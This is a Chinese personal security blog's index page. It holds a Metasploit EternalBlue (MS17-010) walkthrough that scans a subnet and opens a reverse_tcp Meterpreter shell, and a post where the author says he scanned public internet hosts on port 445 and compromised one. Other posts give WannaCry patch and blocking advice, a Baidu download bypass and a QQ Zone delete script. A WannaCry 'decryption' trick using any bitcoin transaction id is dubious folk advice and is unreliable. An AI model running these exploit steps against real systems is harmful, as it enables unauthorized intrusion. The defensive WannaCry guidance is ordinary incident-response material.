Aipp_SecurityBlog 信言不美,美言不信。善者不辩,辩者不善。知者不博,博者不知。
百度云大文件免客户端下载
发表于 2018-2-26 | | tools
javascript:Object.defineProperty(Object.getPrototypeOf(navigator),'platform',{get:function(){return 'sb_baidu';}})
F12控制台执行后点击下载9.png
Meterpreter下eternalblue模块利用
发表于 2018-1-24 | | technology
首先检查防火墙状态并关闭
[[email protected] ~]# msfconsole
启动msf

msf > search eternalblue
搜索模块

先扫描有漏洞主机
msf > use auxiliary/scanner/smb/smb_ms17_010
加载扫描模块

msf > set rhosts 192.168.2.1/24
设置扫描IP直接扫描C段

msf > run
开始扫描

扫出提示: Host is likely VULNERABLE to MS17-010!的可以尝试利用
6.png

msf  > use exploit/windows/smb/ms17_010_eternalblue
加载攻击模块

msf  >set RHOST 192.168.2.9
设置有漏洞的IP

msf  >set RHOST 192.168.2.3
设置本地本机IP


msf  >set payload windows/x64/meterpreter/reverse_tcp
设置payload

msf  >exploit
攻击

成功获取权限
ac.png

7.png

文章内容涉及具有攻击性,仅用作测试,严禁破坏,后果自负。

硬件的忧伤!
发表于 2017-5-30 | | experience
前几天,在搭建一台windows服务器时候发现一些很奇葩的问题在这里陈述一下,给大家借鉴一下!

环境
全新品牌硬件

系统:windows2008 R2 X64标准版!
容器:apache Tomcat
端口:80
网络:内境NET映射(移动专线)
IP:192.168.1.10

路由器:TPlink 网吧专用(很小一个)


1、服务器3389远程无法正常连接(有时正常有时黑屏或者显示协议错误)
2、HTTP服务无法正常打开(时好时坏有时打开反应相当慢)

——问题排查——

最先发现问题3389无法连接表现为连接进入远程桌面时黑屏按照百度办法无效,各种快捷键呼出无效最后只能动脑了!

检查系统防火墙经过查看已经关闭

进入机器eventvwr查看日志 有一条远程记录显示协议错误,百度到的办法是删除注册表
HKEY_LOCAL_MA CHINE\ SYSTEM\CurrentCon trolSet\Services\TermService\ Parame ters”,找到名为 “Cer tificate”的子键,将它删除重启
结果无效

然后尝试修改3389端口为其他端口同样无效
经过不断的尝试放弃系统自带远程,安装teamviewer,经过测试也是无法连接,在输入ID密码后就没反应,经过各种问题查找最后放弃解决远程问题等待处理。

第二天突然发现80端口访问缓慢,甚至打不开,到服务器检查发现用127.0.0.1打开正常:192.168.1.10打开正常用外网IP打开失败,进路由器检查端口映射关闭路由器防火墙!都没发现问题
结果重启了一下服务器,远程正常,外网http打开正常,这难道是服务器系统问题?经过几轮测试的确,出现以上问题重启服务器后即正常,排查了下系统是否有软件这些影响,难道系统问题?没法于是叫人
重新装了一下系统:改为2008 X64 企业版


问题有来了,环境搭建好了后发现又出现前面的问题(什么都没设置安装就搭建http环境)到这我懵逼了!!!!

用tracert追踪路由也没发现问题
经过不断的瞎搞,无意中发现重启了下路由器,外网80又正常了,不断尝试在出现问题后重启路由器均恢复正常,那么问题想通了,路由已经老旧性能跟不上?还是天气太热路由罢工?路由器的问题?果断让他么更换路由!果然更换硬件后问题解决....!

那么问题来了  要是更换新的路由器后万一不是路由的问题咋办勒?!!!...



WannaCry蠕虫解密工具
发表于 2017-5-20 | | tools
近日,国外研究人员Adrien Guinet发现,对于感染了勒索软件WannaCry(中文名称魔窟)的Windows XP和Windows 7两个操作系统,在没有重新启动的前提下,勒索软件的加密私钥仍可以在内存获取,从而实现解密文件。基于此研究成果,安天立即翻译了该外文文献并分享到各专业群,同时改进相关工程代码,发布了本解密工具。
本工具基于如下项目的贡献封装:
1、wannakey项目:https://github.com/aguinet/wannakey
2、wanakiwi项目:https://github.com/gentilkiwi/wanakiwi

工具系安天CERT根据https://github.com/gentilkiwi/wanakiwi的分析成果,和编写的工程代码所编写,安天CERT做了BUG调试修改,并为了让可以简单易用,做了GUI封装,相关成果归原研究者和基础实现者所有,安天所编写的代码也会尽快公开。

[版本号: v1.0 发布时间:2017年5月20日 3时]
[SHA1: SHA1: 7545E605C86ABD8EB044701226D56FCD47AD34F6]
下载地址
Shadow Brokers组织宣布将在6月公开更多0day漏洞!
发表于 2017-5-17 | | news
几小时前,Shadow Brokers发布了一篇声明,将从2017年6月开始公布更多0day漏洞。
去年8月份Shadow Brokers在网上放出方程式组织的入侵工具,这个“方程式组织”隶属于NSA旗下。当时Shadow Brokers将工具打包成了2部分,其中一部分300MB提供免费下载,另外一部分加密文档则以100万比特币的价格出售,可能是100万比特币的价格过于高昂导致无人问津,之后Shadow Brokers只好主动公布了这份300MB文件的解压密码。

或许是WannaCry蠕虫病毒的爆发让Shadow Brokers更加有底气,Shadow Brokers又开始了赚钱的想法,以后新公布的漏洞不会向所有人公开,而是会收取费用。

“TheShadowBrokers将启动月费订阅模式,有点像‘本月美酒俱乐部’。每个月提交会员费,然后获取只提供给会员的泄露数据。”
这样的模式有利有弊。好处在于之后的这些漏洞在公布之后就会有针对的补丁,而坏处在于黑客组织会把这些0day exp和黑客工具卖给私密的会员,而不会告知微软。

很显然,之后Shadow Brokers可能会有各类客户,包括其他的一些黑客、犯罪组织、国家支持的那些黑客们,可能还会有记者和科技公司。
6月暴风雨来袭,你准备好了吗?

Shadow Brokers称,会员会收到的泄露信息会包括:
针对浏览器、路由器和智能手机的exp
针对操作系统的exp,包括Windows 10操作系统
从银行和使用Swift金融信息系统的机构泄露的数据
从俄罗斯、中国、伊朗、朝鲜窃取的核导弹项目的网络信息


Shadow Brokers组织发布的这份声明中的情况暂时还无法验证,但基于之前Shadow Brokers泄露文件的真实性,这份声明必须严肃对待。之前Shadow Brokers泄露的EternalBlue和DoublePulsar漏洞已经对全球网络造成了重大影响。

关于“wannacry”勒索软件的紧急预警(相关专杀和文件修复工具)
发表于 2017-5-14 | | news

日前,国家计算机病毒应急处理中心通过对互联网的监测,发现一个名为“wannacry”的勒索软件病毒正在全球大范围蔓延,截至目前,该病毒已经席卷包括中国、美国、俄罗斯及欧洲在内的100多个国家。我国部分高校内网、大型企业内网和政府机构专网遭受攻击。经紧急分析,判定该勒索软件是一个名为“wannacry”的新家族,基于445端口的SMB漏洞(MS17-101)进行传播,攻击者利用该漏洞,针对关闭防火墙的目标机器,通过445端口发送预先设计好的网络数据包文,实现远程代码执行。当系统被该勒索软件感染后,一是会弹出勒索对话框,采用AES和RSA加密算法加密系统中的照片、图片、文档、压缩包、音频、视频、可执行文件等类型的文件;二是会将自身复制到系统的每个文件夹下,并重命名为“@[email protected]”;三是生成随机IP并发起新的网络攻击。


由于该勒索软件的加密强度大,目前被加密的文件还无法解密恢复。针对遭受攻击的情况,建议采取如下措施:

1、在无法判断是否感染该勒索软件的情况下,立即断网,检查电脑主机,修复MS17-010漏洞、关闭445端口。

2、对已经感染勒索软件攻击的机器建议立即隔离处置,防止感染范围进一步扩大。

3、出于基于权限最小化的安全实践,建议用户关闭并非必需使用的Server服务。

4、及时备份重要业务系统数据,针对重要业务终端进行系统镜像,制作足够的系统恢复盘或者设备进行替换。

5、目前亚信、安天、360、北信源四家公司已经研发出针对该病毒的最新专杀工具。

亚信专杀下载地址(32位):http://support.asiainfo-sec.com/Anti-Virus/Clean-Tool/ATTK_CN/supportcustomizedpackage.exe

亚信专杀下载地址(64位):http://support.asiainfo-sec.com/Anti-Virus/Clean-Tool/ATTK_CN/supportcustomizedpackage_64.exe

亚信专杀使用说明:http://support.asiainfo-sec.com/Anti-Virus/Clean-Tool/ATTK_CN/ATTK_USER_MANUAL.doc

安天专杀下载地址:http://www.antiy.com/response/wannacry/ATScanner.zip

安天免疫下载地址:http://www.antiy.com/response/wannacry/Vaccine_for_wannacry.zip。

安天应对说明链接:http://www.antiy.com/response/Antiy_Wannacry_FAQ.html。

360公司免疫工具下载链接:http://b.360.cn/other/onionwormimmune

360公司专杀工具下载链接:http://b.360.cn/other/onionwormkiller

北信源公司专杀免疫工具下载链接:http://www.vrv.com.cn/index.php?m=content&c=index&a=lists&catid=205

    360 企业安全针对“永恒之蓝”攻击紧急应对手册
      360企业安全针对“永恒之蓝”攻击的应急处理.pdf




文件恢复
       下载使用“360勒索蠕虫病毒文件恢复工具”恢复被加密的文件
       下载地址http://dl.360safe.com/recovery/RansomRecovery.exe

       注意:不能百分之百恢复文件,工具的文件恢复成功率会受到文件数量、时间、磁盘操作情况等因素影响。一般来说,中毒后越早恢复,成功的几率越高
        来源http://bobao.360.cn/news/detail/4162.html

全球爆发勒索病毒攻击,国内中枪(附修复方案)
发表于 2017-5-13 | | news


ca.png
今早睡一觉起来就发现国内出大事了,发现很多人谈到被感染了勒索病毒(文件被锁需支付赎金)今年真是多事之秋
由于前不久爆出NSA方程式工具,此次大面积感染便是445等漏洞引起



测试了下至今为止在公网上仍旧存在大量开放445端口的机器,部分可以成功利用!

扫了一下 一会就成功一台

9.png
666.png
很多运营商IDC公司已经屏蔽了危险的端口但是问题没有解决,内部还是脆弱的,若在同一个网络环境下还是一打一个准。

----------修复方案----------

工具解
决办法1

1.1微软升级补丁(微软总部决定对已停服的XP和部分服务器版本发布特别补丁公告)[4]
KB4012215
KB4012212赶快收藏,应对勒索软件“WannaCry”的开机指南

例如windows 7 64位用户 两个补丁都要下载安装,安装无先后顺序

有XP和windows2003更新补丁:
https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

1.2内部网络

1.3建立灭活域名实现免疫

安天CERT的最新分析结论表明,勒索软件的触发机制是否能访问

iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com(注:“[]”是为了防止误操作点击刻意添加,实际域名中无“[]”),如果访问成功,则不会触发勒索功能。

注:不建议隔离网用户直接连接互联网方式进行灭活。

根据此结论,网络管理人员可以先在内部网中建立灭活域名,必须搭建内部解析服务。可以通过在内部网络搭建DNS Server,将iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com域名地址解析到内网WEB Server的IP地址,同时WEB Server可以接受该域名的连接请求,从而实现免疫。同时,也可以监测内网访问该域名的用户IP地址和用户数量统计出内部用户的感染情况。

1.4操作步骤

准备移动U盘或者光盘;

下载专杀工具和免疫工具:

地址如下:

(1)蠕虫勒索软件专杀工具(WannaCry):
Wannacry勒索者软件清除工具可以对已经感染的主机进行勒索软件的清除,但无法恢复已经被加密的文件。提示:建议将该工具刻录至光盘后在电脑中运行,避免重复感染。
http://www.antiy.com/response/wannacry/ATScanner.zip

(2)蠕虫勒索软件免疫工具(WannaCry):

本工具提供禁用系统服务、修改hosts文件、设置ipsec本地组策略等功能,能阻断通过SMB漏洞MS17-010向本机传播WannaCry勒索软件,但不能阻断WannaCry在本机上的运行。提示:建议将该工具刻录至光盘后在电脑中运行,避免重复感染。
http://www.antiy.com/response/wannacry/Vaccine_for_wannacry.zip

将下载的两款工具拷贝至U盘或刻入光盘;
拔掉主机网线,开机;

使用蠕虫勒索软件免疫工具(WannaCry),免疫工具可以提供禁用系统服务、修改hosts文件、设置ipsec本地组策略等多种方式对勒索软件WannaCry感染传播途径进行有效阻断,实现主机免疫功能;赶快收藏,应对勒索软件“WannaCry”的开机指南

免疫后,使用蠕虫勒索软件专杀工具(WannaCry),WannaCry勒索者软件清除工具可以对已经感染的主机进行勒索软件的清除。(但无法解密已经被加密的文件。)赶快收藏,应对勒索软件“WannaCry”的开机指南

关机、重启机器,连接网络,开启系统自动更新,并检测更新进行安装。

互联网络

对于接入互联网的网络,可无需建立灭活域名。如有条件,也可参照2.2.1设置灭活域名。但切忌把iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com作为IOC用来阻断对该域名的请求!!!

被WannaCry勒索者感染的用户补救方案
首先拔掉网线,与内网其他机器隔离;

使用蠕虫勒索软件免疫工具(WannaCry)免疫;

使用蠕虫勒索软件专杀工具(WannaCry)清除病毒;

使用PE盘进入操作系统,将可用文件进行备份,并对备份数据进行离线处理;


手动解决办法二
适用于客户端操作系统
打开“控制面板”,单击“程序”,然后单击“打开或关闭 Windows 功能”。
在“Windows 功能”窗口中,清除“SMB 1.0/CIFS 文件共享支持”复选框,然后单击“确定”以关闭此窗口。
重启系统。

适用于服务器操作系统:
打开“服务器管理器”,单击“管理”菜单,然后选择“删除角色和功能”。
在“功能”窗口中,清除“SMB 1.0/CIFS 
文件共享支持”复选框,然后单击“确定”以关闭此窗口。
重启系统。

适用于运行Windows 7、 Windows Server 2008 R2、 Windows Vista 和 Windows Server 2008,修改注册表
注册表路径︰ HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters
新建项︰ SMB1,值0(DWORD)
重新启动

一、关闭并禁用Server服务。以管理员权限打开CMD,运行
net stop server
sc config LanmanServer start= disabled

二、开启防火墙,禁用445端口。以管理员权限打开CMD,运行以下脚本(锦佰安提供):
netsh firewall set opmode enable
netsh advfirewall firewall add rule name="deny445" dir=in protocol=tcp localport=445 action=block

三、对于微软不再提供补丁的Windows XP用户,打开CMD,运行(记得禁用相关服务):
net stop rdr
net stop srv
net stop netbt

四、对于Windows 7以上版本的用户,如果有外网,直接打补丁即可:
https://technet.microsoft.com/zh-cn/library/security/MS17-010

五、使用360NSA武器库免疫工具,下载地址:http://dl.360safe.com/nsa/nsatool.exe


----------------------------------------------
中招尝试解决方案(来自网络)
----------------------------------------------

方法一:

1:打开自己的那个勒索软件界面,点击copy. (复制黑客的比特币地址)
2:把copy粘贴到btc.com (区块链查询器)
3:在区块链查询器中找到黑客收款地址的交易记录,然后随意选择一个txid(交易哈希值)
4:把txid 复制粘贴给 勒索软件界面按钮connect us.
5:等黑客看到后 你再点击勒索软件上的check payment. 
6:再点击decrypt 解密文件即可。

方法二:
下载开源的脚本(需要python3环境)来运行尝试恢复。
下载链接:https://github.com/QuantumLiu/antiBTCHack


自动删除QQ空间说说脚本
发表于 2017-5-6 | | technology
进入我的说说
按F12
进入Console,回车

var delay = 1000;
function del() {
    document.querySelector('.app_canvas_frame').contentDocument.querySelector('.del_btn').click();
    setTimeout("yes()", delay);
}
function yes() {
    document.querySelector('.qz_dialog_layer_btn').click();
    setTimeout("del()", delay);
}
del();

等待完成
TOP